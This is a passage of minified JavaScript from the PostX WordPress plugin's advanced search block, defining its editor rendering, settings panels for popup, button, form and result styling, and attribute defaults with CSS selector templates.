t=e.moreResultPosts!==E.moreResultPosts||E.moreResultsbtn!==e.moreResultsbtn||e.resExcerptLimit!=E.resExcerptLimit||E.resExcerptEnable!=e.resExcerptEnable||e.searchPostType!=E.searchPostType;(e.searchVal!==k.searchVal||t)&&ee(k.searchVal,!0),e.loadmore!=k.loadmore&&ee(k.searchVal,!1,k.loadmore)}else t.current=E}),[E]);const ae={setAttributes:x,name:_,attributes:E,setSection:f,section:l,clientId:C};let ie;if(S&&(ie=(0,i.Kh)(E,"ultimate-post/advanced-search",S,(0,a.k0)())),D)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:D});const ne=0==k.searchVal.length?[]:k?.postsList,re=(0,r.Z)("","advanced_search",ultp_data.affiliate_id),se=d({...z&&{id:z},className:`ultp-block-${S} ${T}`});return(0,o.createElement)(b,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:ae})),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:ae}),(0,o.createElement)("div",se,ie&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ie}}),!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-pro-helper"},(0,o.createElement)("div",{className:"ultp-pro-helper__upgrade"},(0,o.createElement)("span",null,"To Unlock Search - PostX Block"),(0,o.createElement)("a",{className:"ultp-upgrade-pro",href:re,target:"_blank",rel:"noreferrer"}," ","Upgrade to Pro"," "),(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/blocks/#demoid8233",target:"_blank",rel:"noreferrer"}," ","View Demo"))),(0,o.createElement)("div",{className:"ultp-block-wrapper "+(ultp_data.active?"":" ultp-wrapper-pro")},(0,o.createElement)("div",{className:"ultp-search-container "+(G?" popup-active ultp-search-animation-"+K:"")},G&&(0,o.createElement)("div",{onClick:()=>w({...k,searchNavPopup:!k.searchNavPopup,postsList:"",loading:!1})},te(W)),G&&(0,o.createElement)("div",{className:"ultp-search-popup"},(0,o.createElement)("div",{className:"ultp-canvas-wrapper "+(k.searchNavPopup?"canvas-popup-active":"")},(0,o.createElement)("div",{className:"ultp-search-canvas"},Y&&(0,o.createElement)(u,{key:"editable",tagName:"div",className:"ultp-search-popup-heading",placeholder:__("Change Text…","ultimate-post"),onChange:e=>x({windowpopupText:e}),value:X}),oe(F,q,$),L&&le(ne,I,J,V))),G&&"popup"!=K&&k.searchNavPopup&&(0,o.createElement)("div",{className:"ultp-popupclose-icon",onClick:()=>w({...k,searchVal:"",searchNavPopup:!1,postsList:"",loading:!1})},s.ZP.close_line)),!G&&oe(F,q,$)),L&&!G&&(0,o.createElement)("div",{className:"ultp-search-dropdown"},le(ne,I,J,V)))))}},16130:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=e=>{const{store:t}=e,{searchPopup:l,searchAjaxEnable:r,moreResultsbtn:s}=t.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8233",store:t}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{store:t,initialOpen:!0,title:__("Structure Setting","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"searchAjaxEnable",label:__("Ajax Search","ultimate-post")}},{position:2,data:{type:"select",key:"searchFormStyle",image:!0,defaultMedia:!0,label:__("Choose Search Form Style","ultimate-post"),options:[{label:"Input Style 1",value:"input1",img:"assets/img/layouts/search/inputform/input-form1.svg"},{label:"Input Style 2",value:"input2",img:"assets/img/layouts/search/inputform/input-form2.svg"},{label:"Input Style 3",value:"input3",img:"assets/img/layouts/search/inputform/input-form3.svg"}]}},{position:3,data:{type:"text",key:"searchnoresult",label:__("No Result Found Text","ultimate-post")}},{position:4,data:{type:"toggle",key:"searchPopup",label:__("Enable Search Popup","ultimate-post")}},{position:5,data:{type:"select",key:"searchPopupIconStyle",defaultMedia:!0,image:!0,label:__("Choose Popup Icon Style","ultimate-post"),options:[{label:"Popup Style 1",value:"popup-icon1",img:"assets/img/layouts/search/popupicon/search.svg"},{label:"Popup Style 2",value:"popup-icon2",img:"assets/img/layouts/search/popupicon/leftsearch.svg"},{label:"Popup Style 3",value:"popup-icon3",img:"assets/img/layouts/search/popupicon/rightsearch.svg"}]}},{position:6,data:{type:"search",key:"searchPostType",label:__("Exclude Post Type","ultimate-post"),multiple:!0,search:"allPostType",pro:!0}},{position:6,data:{type:"alignment",key:"searchIconAlignment",label:__("Popup Icon Alignment","ultimate-post"),disableJustify:!0}}]}),l&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Icon","ultimate-post"),include:[{position:1,data:{type:"range",key:"popupIconGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Text and Icon","ultimate-post")}},{position:2,data:{type:"range",key:"popupIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:3,data:{type:"typography",key:"popupIconTextTypo",label:__("Search Text Typography","ultimate-post")}},{position:4,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"popupIconColor",label:__("Color","ultimate-post")},{type:"color",key:"popupIconTextColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"popupIconBg",label:__("Background Color","ultimate-post")},{type:"border",key:"popupIconBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"popupIconHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"popupIconTextHoverColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"popupIconHoverBg",label:__("Hover Background Color","ultimate-post")},{type:"border",key:"IconHoverBorder",label:__("Hover Border","ultimate-post")}]}]}},{position:5,data:{type:"dimension",key:"popupIconPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:7,data:{type:"dimension",key:"popupIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Search Button","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"enableSearchPage",label:__("Click to go Search Result Page","ultimate-post")}},{position:2,data:{type:"toggle",key:"btnNewTab",label:__("Open In New Tab","ultimate-post")}},{position:3,data:{type:"toggle",key:"searchBtnText",label:__("Enable Text","ultimate-post")}},{position:4,data:{type:"toggle",key:"searchBtnIcon",label:__("Enable Icon","ultimate-post")}},{position:5,data:{type:"toggle",key:"searchIconAfterText",label:__("Icon After Text","ultimate-post")}},{position:6,data:{type:"toggle",key:"searchBtnReverse",label:__("Reverse Search Button","ultimate-post")}},{position:7,data:{type:"text",key:"searchButtonText",label:__("Search Button Text","ultimate-post")}},{position:8,data:{type:"range",key:"searchButtonPosition",min:0,max:300,step:1,responsive:!0,label:__("Button Gap","ultimate-post")}},{position:9,data:{type:"range",key:"searchTextGap",min:0,max:300,step:1,responsive:!0,label:__("Search Text Gap","ultimate-post")}},{position:10,data:{type:"range",key:"searchBtnIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:11,data:{type:"typography",key:"searchBtnTextTypo",label:__("Search Text Typography","ultimate-post")}},{position:12,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"searchBtnIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"searchBtnTextColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"searchBtnBg",label:__("Background Color","ultimate-post")},{type:"border",key:"btnBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"searchBtnIconHoverColor",label:__("Icon Hover Color","ultimate-post")},{type:"color",key:"searchBtnTextHoverColor",label:__("Text Color","ultimate-post")},{type:"color2",key:"searchBtnHoverBg",label:__("Hover Background Color","ultimate-post")},{type:"border",key:"btnHoverBorder",label:__("Hover Border","ultimate-post")}]}]}},{position:13,data:{type:"dimension",key:"searchBtnPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:14,data:{type:"dimension",key:"searchBtnRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}}]}),l&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Popup Canvas","ultimate-post"),include:[{position:1,data:{type:"select",key:"popupAnimation",image:!0,defaultMedia:!0,label:__("Popup  Type","ultimate-post"),options:[{label:"Popup",value:"popup",img:"assets/img/layouts/search/popuptype/popup.svg"},{label:"Top Window",value:"top",img:"assets/img/layouts/search/popuptype/topView.svg"},{label:"Full Window",value:"fullwidth",img:"assets/img/layouts/search/popuptype/fullWindow.svg"}]}},{position:2,data:{type:"separator",label:__("Search Popup Heading","ultimate-post")}},{position:3,data:{type:"toggle",key:"windowpopupHeading",label:__("Search Heading","ultimate-post")}},{position:4,data:{type:"alignment",key:"windowpopupHeadingAlignment",disableJustify:!0,label:__("Heading Alignment","ultimate-post")}},{position:5,data:{type:"text",key:"windowpopupText",label:__("Heading Text","ultimate-post")}},{position:6,data:{type:"typography",key:"windowpopupHeadingTypo",label:__("Search Heading Typography","ultimate-post")}},{position:7,data:{type:"color",key:"windowpopupHeadingColor",label:__("Search Heading Color","ultimate-post")}},{position:8,data:{type:"range",key:"popupHeadingSpacing",min:0,max:300,step:1,responsive:!0,label:__("Heading Spacing","ultimate-post")}},{position:9,data:{type:"separator",key:"popupCloseIconSeparator",label:__("Close Icon Style","ultimate-post")}},{position:10,data:{type:"range",key:"popupCloseSize",min:0,max:300,step:1,responsive:!0,label:__("Close Icon Size","ultimate-post")}},{position:11,data:{type:"color",key:"popupCloseColor",label:__("Close Icon Color","ultimate-post")}},{position:12,data:{type:"color",key:"popupCloseHoverColor",label:__("Close Icon Hover Color","ultimate-post")}},{position:13,data:{type:"separator",label:__("Canvas Wrapper Style","ultimate-post")}},{position:14,data:{type:"color2",key:"popupBG",label:__("Canvas Background","ultimate-post")}},{position:15,data:{type:"range",key:"canvasWidth",min:0,max:1e3,step:1,unit:!0,responsive:!0,label:__("Canvas Width","ultimate-post")}},{position:16,data:{type:"dimension",key:"popupPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:17,data:{type:"dimension",key:"popupRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:18,data:{type:"boxshadow",key:"popupShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}},{position:19,data:{type:"tag",key:"searchPopupPosition",label:__("Position Left/Right","ultimate-post"),options:[{value:"left",label:__("Start Left","ultimate-post")},{value:"right",label:__("Start Right","ultimate-post")}]}},{position:20,data:{type:"range",key:"popupPositionX",min:0,max:300,step:1,responsive:!0,label:__("Dropdown Position X","ultimate-post")}},{position:21,data:{type:"range",key:"popupPositionY",min:0,max:300,step:1,responsive:!0,label:__("Dropdown Position Y","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Search Form","ultimate-post"),include:[{position:1,data:{type:"text",key:"searchInputPlaceholder",label:__("Input Placeholder","ultimate-post")}},{position:2,data:{type:"typography",key:"inputTypo",label:__("Search Input Typography","ultimate-post")}},{position:3,data:{type:"range",key:"searchFormWidth",min:0,max:900,step:1,unit:!0,responsive:!0,label:__("Search Form Width","ultimate-post")}},{position:4,data:{type:"range",key:"inputHeight",min:0,max:300,step:1,responsive:!0,label:__("Input Height","ultimate-post")}},{position:5,data:{type:"color",key:"inputColor",label:__("Input Color","ultimate-post")}},{position:6,data:{type:"color2",key:"inputBg",label:__("Input Background","ultimate-post")}},{position:7,data:{type:"border",key:"inputFocusBorder",label:__("Input Focus Border","ultimate-post")}},{position:8,data:{type:"border",key:"inputBorder",label:__("Input Border","ultimate-post")}},{position:9,data:{type:"dimension",key:"inputPadding",step:1,unit:!0,responsive:!0,label:__("Input Padding","ultimate-post")}},{position:10,data:{type:"dimension",key:"inputRadius",step:1,unit:!0,responsive:!0,label:__("Input Radius","ultimate-post")}},{position:11,data:{type:"range",key:"searchClear",min:0,max:300,step:1,responsive:!0,label:__("Search Clear Icon Position","ultimate-post")}}]}),r&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("Search Result","ultimate-post"),include:[{position:1,data:{type:"range",key:"resColumn",min:0,max:3,step:1,responsive:!0,label:__("Result Column","ultimate-post")}},{position:2,data:{type:"range",key:"resultGap",min:0,max:300,step:1,responsive:!0,label:__("Gap","ultimate-post")}},{position:3,data:{type:"toggle",key:"resExcerptEnable",label:__("Enable Excerpt","ultimate-post")}},{position:4,data:{type:"toggle",key:"resCatEnable",label:__("Enable Category","ultimate-post")}},{position:5,data:{type:"toggle",key:"resAuthEnable",label:__("Enable Author","ultimate-post")}},{position:6,data:{type:"toggle",key:"resDateEnable",label:__("Enable Publish Date","ultimate-post")}},{position:7,data:{type:"toggle",key:"resImageEnable",label:__("Enable Image","ultimate-post")}},{position:8,data:{type:"separator"}},{position:9,data:{type:"range",key:"resImageSize",min:0,max:300,step:1,responsive:!0,label:__("Image Size","ultimate-post")}},{position:9,data:{type:"dimension",key:"resImageRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{position:10,data:{type:"range",key:"resImageSpace",min:0,max:300,step:1,responsive:!0,label:__("Image Gap","ultimate-post")}},{position:11,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"resTitleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"resExcerptColor",label:__("Excerpt Color","ultimate-post")},{type:"color",key:"resMetaColor",label:__("Meta  Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"resTitleHoverColor",label:__("Title Hover Color","ultimate-post")},{type:"color",key:"resMetaHoverColor",label:__("Meta Hover Color","ultimate-post")}]}]}},{position:12,data:{type:"typography",key:"resTitleTypo",label:__("Title Typography","ultimate-post")}},{position:13,data:{type:"typography",key:"resMetaTypo",label:__("Meta Typography","ultimate-post")}},{position:14,data:{type:"typography",key:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}},{position:15,data:{type:"range",key:"resExcerptLimit",min:0,max:400,step:1,label:__("Excerpt Limit","ultimate-post")}},{position:16,data:{type:"separator",label:__("Meta Separator Style","ultimate-post")}},{position:17,data:{type:"range",key:"resultMetaSpace",min:0,max:300,step:1,responsive:!0,label:__("Meta Spacing","ultimate-post")}},{position:18,data:{type:"range",key:"resultMetaSeparatorSize",min:0,max:300,step:1,responsive:!0,label:__("Meta Separator Size","ultimate-post")}},{position:19,data:{type:"color",key:"resMetaSeparatorColor",label:__("Meta Separator Color","ultimate-post")}},{position:20,data:{type:"toggle",key:"resultHighlighter",label:__("Enable Highlighter","ultimate-post")}},{position:21,data:{type:"color",key:"resultHighlighterColor",label:__("Highlighter Color","ultimate-post")}},{position:22,data:{type:"separator",label:__("Wrapper Style","ultimate-post")}},{position:23,data:{type:"color2",key:"resultBg",label:__("Background Color","ultimate-post")}},{position:24,data:{type:"range",key:"resultMaxHeight",min:0,max:900,step:1,responsive:!0,label:__("Result Box Height","ultimate-post")}},{position:25,data:{type:"dimension",key:"resultPadding",unit:!0,responsive:!0,label:__("Item Padding","ultimate-post")}},{position:26,data:{type:"border",key:"resultBorder",label:__("Border","ultimate-post")}},{position:27,data:{type:"dimension",key:"resultBorderRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:28,data:{type:"boxshadow",key:"resultShadow",step:1,unit:!0,responsive:!0,label:__("Box Shadow","ultimate-post")}},{position:29,data:{type:"range",key:"resultSpacingX",min:0,max:300,step:1,responsive:!0,label:__("Horizontal Position","ultimate-post")}},{position:30,data:{type:"range",key:"resultSpacingY",min:0,max:300,step:1,responsive:!0,label:__("Vertical Position","ultimate-post")}},{position:31,data:{type:"toggle",key:"resultSeparatorEnable",label:__("Enable Separator","ultimate-post")}},{position:32,data:{type:"color",key:"resultSeparatorColor",label:__("Separator Color","ultimate-post")}},{position:33,data:{type:"range",key:"resultSeparatorWidth",min:0,max:30,step:1,responsive:!0,label:__("Separator Width","ultimate-post")}},{position:34,data:{type:"toggle",key:"resMoreResultDevider",label:__("Disable Result Item Separator","ultimate-post")}}]}),r&&(0,o.createElement)(a.T,{store:t,initialOpen:!1,title:__("More Result's","ultimate-post"),depend:"moreResultsbtn",include:[{position:1,data:{type:"range",key:"moreResultPosts",min:0,max:100,step:1,label:__("Show Initial Post","ultimate-post")}},{position:2,data:{type:"text",key:"moreResultsText",label:__("View More Results","ultimate-post")}},{position:3,data:{type:"typography",key:"moreResultsTypo",label:__("Typography","ultimate-post")}},{position:4,data:{type:"color",key:"moreResultsColor",label:__("Color","ultimate-post")}},{position:5,data:{type:"color",key:"moreResultsHoverColor",label:__("Hover Color","ultimate-post")}}]})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{store:t,initialOpen:!0,title:__("Adavnced Settings","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}},{position:3,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())}},85258:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},blockPubDate:{type:"string",default:"empty"},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},searchAjaxEnable:{type:"boolean",default:!0},searchFormStyle:{type:"string",default:"input1",style:[{depends:[{key:"searchBtnReverse",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-searchres-input { padding-left: 16px; }"},{depends:[{key:"searchBtnReverse",condition:"==",value:!0}]}]},searchnoresult:{type:"string",default:"No Results Found",style:[{depends:[{key:"searchAjaxEnable",condition:"==",value:!0}]}]},searchPopup:{type:"boolean",default:!1},searchPopupIconStyle:{type:"string",default:"popup-icon1",style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchPopupIconStyle",condition:"==",value:"popup-icon1"}]},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchPopupIconStyle",condition:"==",value:"popup-icon2"}]},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchPopupIconStyle",condition:"==",value:"popup-icon3"}],selector:"{{ULTP}} .ultp-searchpopup-icon { flex-direction: row-reverse }"}]},searchPostType:{type:"string",default:""},searchIconAlignment:{type:"string",default:"left",style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchIconAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-searchpopup-icon { margin: 0 auto; }"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchIconAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-searchpopup-icon,  \n                {{ULTP}} .ultp-search-animation-popup .ultp-search-canvas { margin-right: auto; }"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"searchIconAlignment",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-searchpopup-icon, \n                {{ULTP}} .ultp-search-animation-popup .ultp-search-canvas { margin-left: auto; }"}]},popupIconGap:{type:"object",default:{lg:"17",unit:"px"},style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon { gap:{{popupIconGap}}; }"}]},popupIconSize:{type:"object",default:{lg:"17",unit:"px"},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon svg { height:{{popupIconSize}}; width:{{popupIconSize}}; }"}]},popupIconTextTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon .ultp-search-button__text"}]},popupIconColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{selector:"{{ULTP}} .ultp-searchpopup-icon svg { color:{{popupIconColor}}; }"}]},popupIconTextColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon .ultp-search-button__text { color: {{popupIconTextColor}}; }"}]},popupIconBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon"}]},popupIconHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-searchpopup-icon:hover svg { color: {{popupIconHoverColor}}; }"}]},popupIconTextHoverColor:{type:"string",default:"",style:[{depends:[{key:"searchPopupIconStyle",condition:"!=",value:"popup-icon1"}],selector:"{{ULTP}} .ultp-searchpopup-icon:hover .ultp-search-button__text { color: {{popupIconTextHoverColor}}; }"}]},popupIconHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon:hover"}]},popupIconPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"8",right:"8",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon { padding: {{popupIconPadding}}; }"}]},popupIconBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000"},style:[{selector:"{{ULTP}}  .ultp-searchpopup-icon"}]},IconHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000"},style:[{selector:"{{ULTP}}  .ultp-searchpopup-icon:hover"}]},popupIconRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-searchpopup-icon { border-radius: {{popupIconRadius}}; }"}]},searchBtnEnable:{type:"boolean",default:!1},btnNewTab:{type:"boolean",default:!1},enableSearchPage:{type:"boolean",default:!0,style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}]},{depends:[{key:"searchBtnText",condition:"==",value:!0}]}]},searchBtnText:{type:"boolean",default:!0},searchBtnIcon:{type:"boolean",default:!0},searchIconAfterText:{type:"boolean",default:!1,style:[{depends:[{key:"searchIconAfterText",condition:"==",value:!1},{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchBtnText",condition:"==",value:!0}]},{depends:[{key:"searchIconAfterText",condition:"==",value:!0},{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { flex-direction: row-reverse }"}]},searchButtonText:{type:"text",default:"Search"},searchButtonPosition:{type:"object",default:{lg:"7",unit:"px"},style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input1"}],selector:"{{ULTP}} .ultp-searchform-content.ultp-searchform-input1 { gap:{{searchButtonPosition}}; }"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-button { right: {{searchButtonPosition}}; left: auto; }"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { left: {{searchButtonPosition}}; right: auto;}"},{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input1"}],selector:"{{ULTP}} .ultp-searchform-content.ultp-searchform-input1 { gap:{{searchButtonPosition}}; }"},{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-button { right: {{searchButtonPosition}}; left: auto; }"},{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { left: {{searchButtonPosition}}; right: auto;}"}]},searchTextGap:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0},{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { gap: {{searchTextGap}}; }"}]},searchBtnIconSize:{type:"object",default:{lg:"17",unit:"px"},style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button svg { height:{{searchBtnIconSize}}; width:{{searchBtnIconSize}}; }"}]},searchBtnTextTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button .ultp-search-button__text"}]},searchBtnIconColor:{type:"string",default:"#fff",style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button svg { color:{{searchBtnIconColor}}; }"}]},searchBtnTextColor:{type:"string",default:"#fff",style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button .ultp-search-button__text { color: {{searchBtnTextColor}}; }"}]},searchBtnBg:{type:"object",default:{openColor:1,type:"color",color:"#212121",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button"}]},btnBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-search-button"}]},searchBtnIconHoverColor:{type:"string",default:"",style:[{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover svg { color:{{searchBtnIconHoverColor}}; }"}]},searchBtnTextHoverColor:{type:"string",default:"",style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover .ultp-search-button__text { color: {{searchBtnTextHoverColor}}; }"}]},searchBtnHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button:hover"}]},btnHoverBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#000"},style:[{selector:"{{ULTP}} .ultp-search-button:hover"}]},searchBtnPadding:{type:"object",default:{lg:{top:"13",bottom:"13",left:"13",right:"13",unit:"px"}},style:[{depends:[{key:"searchBtnText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { padding: {{searchBtnPadding}}; }"},{depends:[{key:"searchBtnIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { padding: {{searchBtnPadding}}; }"}]},searchBtnRadius:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-button { border-radius: {{searchBtnRadius}}; }"}]},searchClear:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-search-clear { right: {{searchClear}} !important; }"}]},popupAnimation:{type:"string",default:"popup"},popupCloseIconSeparator:{type:"string",default:"Close Icon Style",style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}]}]},popupCloseSize:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-popupclose-icon svg { height:{{popupCloseSize}}; width:{{popupCloseSize}}; }"}]},popupCloseColor:{type:"string",default:"#000",style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-popupclose-icon svg { color:{{popupCloseColor}}; }"}]},popupCloseHoverColor:{type:"string",default:"#7777",style:[{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-popupclose-icon:hover svg { color:{{popupCloseHoverColor}}; }"}]},windowpopupHeading:{type:"boolean",default:!0},windowpopupText:{type:"string",default:"Search The Query"},windowpopupHeadingAlignment:{type:"string",default:"center",style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading { text-align:{{windowpopupHeadingAlignment}}; }"}]},windowpopupHeadingTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:24,unit:"px"},decoration:"none",family:"",weight:600},style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading"}]},windowpopupHeadingColor:{type:"string",default:"#000",style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading { color:{{windowpopupHeadingColor}}; }"}]},popupHeadingSpacing:{type:"object",default:{lg:"12"},style:[{depends:[{key:"windowpopupHeading",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-popup-heading { margin-bottom: {{popupHeadingSpacing}}px;}"}]},searchPopupPosition:{type:"string",default:"right",style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"}]}]},popupBG:{type:"object",default:{openColor:1,type:"color",color:"#FCFCFC"},style:[{selector:"{{ULTP}} 